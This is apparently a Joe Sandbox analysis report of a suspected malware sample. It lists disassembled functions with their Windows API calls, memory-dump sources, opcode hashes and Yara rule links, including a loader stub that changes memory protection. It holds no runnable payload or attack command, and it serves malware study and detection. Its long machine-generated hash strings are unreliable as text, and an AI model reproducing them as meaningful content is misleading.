                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00322A33
                                        • KillTimer.USER32(?,00000001), ref: 00322A5D
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00322A80
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00322A8B
                                        • CreatePopupMenu.USER32 ref: 00322A9F
                                        • PostQuitMessage.USER32(00000000), ref: 00322AAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                        • String ID: TaskbarCreated
                                        • API String ID: 157504867-2362178303
                                        • Opcode ID: 1f02ef31eeaa9cd65487402f246288e1c29238ebc87399672fba058a3fc0676a
                                        • Instruction ID: 8b1a97d95007ca8064787dcbc769d17f6ae847c5370e539f13da901e8f9f779b
                                        • Opcode Fuzzy Hash: 1f02ef31eeaa9cd65487402f246288e1c29238ebc87399672fba058a3fc0676a
                                        • Instruction Fuzzy Hash: 1B4124312006A9BBDB37AF68BC49BBF365DE719300F450325F902AACE1DE749C508761
                                        Function 0033E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExW.KERNEL32(?,00000000), ref: 0033E4A7
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • GetCurrentProcess.KERNEL32(00000000,003BDC28,?,?), ref: 0033E567
                                        • GetNativeSystemInfo.KERNEL32(?,003BDC28,?,?), ref: 0033E5BC
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0033E5C7
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0033E5DA
                                        • GetSystemInfo.KERNEL32(?,003BDC28,?,?), ref: 0033E5E4
                                        • GetSystemInfo.KERNEL32(?,003BDC28,?,?), ref: 0033E5F0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                        • String ID:
                                        • API String ID: 2717633055-0
                                        • Opcode ID: b8f0f67997e3b7785df7c348af76230b40a9fc7f39b385bcc814eb28115f81ba
                                        • Instruction ID: 11d03008db83eade6eacfc9c75a8247ec3ce3927bec9c1b230dd1821a58e590f
                                        • Opcode Fuzzy Hash: b8f0f67997e3b7785df7c348af76230b40a9fc7f39b385bcc814eb28115f81ba
                                        • Instruction Fuzzy Hash: 9361B1B2809284DBDF17CF6898C11EA7FA46F2B304F1A45D9D8459F287D634C948CF65
                                        Function 003231F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00323202
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00323219
                                        • LoadResource.KERNEL32(?,00000000), ref: 003957D7
                                        • SizeofResource.KERNEL32(?,00000000), ref: 003957EC
                                        • LockResource.KERNEL32(?), ref: 003957FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: 6932ee811385509d77792d5be6cc89451926be14a0080494d875176c7a3546d2
                                        • Instruction ID: 2279349eeff8486f7cfae51ebe480bbf9550e40ff7d268cfc683712ac692d150
                                        • Opcode Fuzzy Hash: 6932ee811385509d77792d5be6cc89451926be14a0080494d875176c7a3546d2
                                        • Instruction Fuzzy Hash: 8E117971204715BFE7228B65EC48F677BBDEBCAB41F208828F40296A90DB71DD00CA70
                                        Function 00366F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00366F7D
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00366F8D
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00366FAC
                                        • __wsplitpath.LIBCMT ref: 00366FD0
                                        • _wcscat.LIBCMT ref: 00366FE3
                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00367022
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                        • String ID:
                                        • API String ID: 1605983538-0
                                        • Opcode ID: b5f6ff5c67e220e94f73b8a5600cba11449241a7cd0a7f95c23bc60d818d6077
                                        • Instruction ID: 3d89e8633a55ee72c4baa648b50d3939a5e6752634089435b55f042d11071f8b
                                        • Opcode Fuzzy Hash: b5f6ff5c67e220e94f73b8a5600cba11449241a7cd0a7f95c23bc60d818d6077
                                        • Instruction Fuzzy Hash: 5B218771904218ABDB12EBA0CC89BEEBBFCAB49304F5044E5F545E7141E7759F84CB60
                                        Function 0048B0C0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 0048B1FA
                                        • GetProcAddress.KERNEL32(?,00484FF9), ref: 0048B218
                                        • ExitProcess.KERNEL32(?,00484FF9), ref: 0048B229
                                        • VirtualProtect.KERNEL32(00320000,00001000,00000004,?,00000000), ref: 0048B277
                                        • VirtualProtect.KERNEL32(00320000,00001000), ref: 0048B28C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                        • String ID:
                                        • API String ID: 1996367037-0
                                        • Opcode ID: 0ba1124f75322a47437ec4a0ae1606bd38f9ea060c8abc66f020468a88c53be8
                                        • Instruction ID: 3c02a9696f5b01d2075d052e4b7775ce007947dc5b52934d4115712527763376
                                        • Opcode Fuzzy Hash: 0ba1124f75322a47437ec4a0ae1606bd38f9ea060c8abc66f020468a88c53be8
                                        • Instruction Fuzzy Hash: 0C513971A543124FD720AEB8DCD867EB7A0EB123607180F7AD5E1CB3C5E798580683E9
                                        Function 0036EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003678AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 003678CB
                                        • CoInitialize.OLE32(00000000), ref: 0036F04D
                                        • CoCreateInstance.COMBASE(003ADA7C,00000000,00000001,003AD8EC,?), ref: 0036F066
                                        • CoUninitialize.COMBASE ref: 0036F083
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                        • String ID: .lnk
                                        • API String ID: 2126378814-24824748
                                        • Opcode ID: 92aa5d4dcb1a7cc59839412f22249515643b9db9c5da0ecfb3135da658c6e378
                                        • Instruction ID: 3eb2c2a7dca3fa7073030eac7ced6d4fda970ef3f799c70555ba47f9a473e6d6
                                        • Opcode Fuzzy Hash: 92aa5d4dcb1a7cc59839412f22249515643b9db9c5da0ecfb3135da658c6e378
                                        • Instruction Fuzzy Hash: E2A178356043019FC711DF14D894D5ABBE9FF89320F158958F89A9B3A2CB31ED45CB91
                                        Function 0032DCD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: G-2
                                        • API String ID: 0-1651067192
                                        • Opcode ID: 99b8824d751465b8ebd99dc28811477169e93d2a8d5ae64bf29c6c5bada141b0
                                        • Instruction ID: a1503cc016d6b6debcd14e0c338c35b76e50cc9e9a27643a5f587eba23700686
                                        • Opcode Fuzzy Hash: 99b8824d751465b8ebd99dc28811477169e93d2a8d5ae64bf29c6c5bada141b0
                                        • Instruction Fuzzy Hash: 5D22CC74A00226DFDB26DF58E491ABAF7F0FF49300F158069E9569B391E730AD81CB91
                                        Function 0033DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNEL32(0032C848,0032C848), ref: 0033DDA2
                                        • FindFirstFileW.KERNEL32(0032C848,?), ref: 00394A83
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$AttributesFindFirst
                                        • String ID:
                                        • API String ID: 4185537391-0
                                        • Opcode ID: df7b4955086562a349bf96f3a9d2511351f70421cb5adf975fde2eba4ba04437
                                        • Instruction ID: b5a46826d6c23a23eab404ed75b0b19625caa78666d67c6f95808cf561a5387d
                                        • Opcode Fuzzy Hash: df7b4955086562a349bf96f3a9d2511351f70421cb5adf975fde2eba4ba04437
                                        • Instruction Fuzzy Hash: CDE0DF32814401AB8616673CEC4D8FA379C9E0A338F200706F837C28E0EB70AD4586DA
                                        Function 00333680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID:
                                        • API String ID: 3964851224-0
                                        • Opcode ID: e89be7c2fa557b00759739ce0713ce02430bdf937c1dc4f311e133fb7465c632
                                        • Instruction ID: 7b0730361b2c5d43cd46aa6ea52f5e26559c8e234a4c04e7d1b94d255e951ec4
                                        • Opcode Fuzzy Hash: e89be7c2fa557b00759739ce0713ce02430bdf937c1dc4f311e133fb7465c632
                                        • Instruction Fuzzy Hash: E99268706087418FDB26DF18C4C0B6AB7E4BF88304F15895DE98A8B3A2D775ED45CB92
                                        Function 0039C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: e7a40e996ff260008f3990d4f3a3e00f5ff364f2b2e201b7bf9d3ac43c1a033b
                                        • Instruction ID: d0b8184f7906cc3f347c040326595d8bb37d391ea5d7ead4369fdf371d95f8d5
                                        • Opcode Fuzzy Hash: e7a40e996ff260008f3990d4f3a3e00f5ff364f2b2e201b7bf9d3ac43c1a033b
                                        • Instruction Fuzzy Hash: 0EC04CB140401EDFCB56CB80D9459EFB7BCBB04300F104095A116E1400D7709B459B71
                                        Function 0032E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032E279
                                        • timeGetTime.WINMM ref: 0032E51A
                                        • TranslateMessage.USER32(?), ref: 0032E646
                                        • DispatchMessageW.USER32(?), ref: 0032E651
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032E664
                                        • LockWindowUpdate.USER32(00000000), ref: 0032E697
                                        • DestroyWindow.USER32 ref: 0032E6A3
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032E6BD
                                        • Sleep.KERNEL32(0000000A), ref: 00395B15
                                        • TranslateMessage.USER32(?), ref: 003962AF
                                        • DispatchMessageW.USER32(?), ref: 003962BD
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003962D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                        • API String ID: 2641332412-570651680
                                        • Opcode ID: 01e846193ded49315849460d2b128b152c78fc81e250e6770457ea190a834b49
                                        • Instruction ID: b25ce83d6bdc3964263685a444bfacadfef0ba2908241d7cefa6c714962685fe
                                        • Opcode Fuzzy Hash: 01e846193ded49315849460d2b128b152c78fc81e250e6770457ea190a834b49
                                        • Instruction Fuzzy Hash: A762DE70508350DFDB27DF24D886BAA77E8AF45304F14496DF94A8F292DB74E888CB52
                                        Function 00356A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___createFile.LIBCMT ref: 00356C73
                                        • ___createFile.LIBCMT ref: 00356CB4
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00356CDD
                                        • __dosmaperr.LIBCMT ref: 00356CE4
                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00356CF7
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00356D1A
                                        • __dosmaperr.LIBCMT ref: 00356D23
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00356D2C
                                        • __set_osfhnd.LIBCMT ref: 00356D5C
                                        • __lseeki64_nolock.LIBCMT ref: 00356DC6
                                        • __close_nolock.LIBCMT ref: 00356DEC
                                        • __chsize_nolock.LIBCMT ref: 00356E1C
                                        • __lseeki64_nolock.LIBCMT ref: 00356E2E
                                        • __lseeki64_nolock.LIBCMT ref: 00356F26
                                        • __lseeki64_nolock.LIBCMT ref: 00356F3B
                                        • __close_nolock.LIBCMT ref: 00356F9B
                                          • Part of subcall function 0034F84C: CloseHandle.KERNEL32(00000000,003CEEC4,00000000,?,00356DF1,003CEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0034F89C
                                          • Part of subcall function 0034F84C: GetLastError.KERNEL32(?,00356DF1,003CEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0034F8A6
                                          • Part of subcall function 0034F84C: __free_osfhnd.LIBCMT ref: 0034F8B3
                                          • Part of subcall function 0034F84C: __dosmaperr.LIBCMT ref: 0034F8D5
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        • __lseeki64_nolock.LIBCMT ref: 00356FBD
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003570F2
                                        • ___createFile.LIBCMT ref: 00357111
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0035711E
                                        • __dosmaperr.LIBCMT ref: 00357125
                                        • __free_osfhnd.LIBCMT ref: 00357145
                                        • __invoke_watson.LIBCMT ref: 00357173
                                        • __wsopen_helper.LIBCMT ref: 0035718D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                        • String ID: 9A4$@
                                        • API String ID: 3896587723-3991797704
                                        • Opcode ID: b3fe8b007e47677edef97e974497dee1e3546e12912125ff4a145192e222a231
                                        • Instruction ID: 00224f5a1ad0ef58af188bc72b60227df933ba8965b24a790abdcf9e28c3f013
                                        • Opcode Fuzzy Hash: b3fe8b007e47677edef97e974497dee1e3546e12912125ff4a145192e222a231
                                        • Instruction Fuzzy Hash: 912214719041059BEF279F68DC93FAE7BA5EB01321F654229ED21AB2F2C7358D48C790
                                        Function 003676DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 003676ED
                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00367713
                                        • _wcscpy.LIBCMT ref: 00367741
                                        • _wcscmp.LIBCMT ref: 0036774C
                                        • _wcscat.LIBCMT ref: 00367762
                                        • _wcsstr.LIBCMT ref: 0036776D
                                        • 75381560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00367789
                                        • _wcscat.LIBCMT ref: 003677D2
                                        • _wcscat.LIBCMT ref: 003677D9
                                        • _wcsncpy.LIBCMT ref: 00367804
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscat$FileInfoVersion$75381560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 2589663703-1459072770
                                        • Opcode ID: 3c507daf2b8e5319f6ad273e3d2ea03c1f128f49a5a34d662c482f08811af447
                                        • Instruction ID: f3d6914ef96bbded59a1e6f6103123eaaac7ed8e19118011c1eba8db21cab43e
                                        • Opcode Fuzzy Hash: 3c507daf2b8e5319f6ad273e3d2ea03c1f128f49a5a34d662c482f08811af447
                                        • Instruction Fuzzy Hash: 1841F272A042007AE707AB649C87EFF7BECDF15714F40405AF900AF592EB75AA4086A1
                                        Function 00321F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
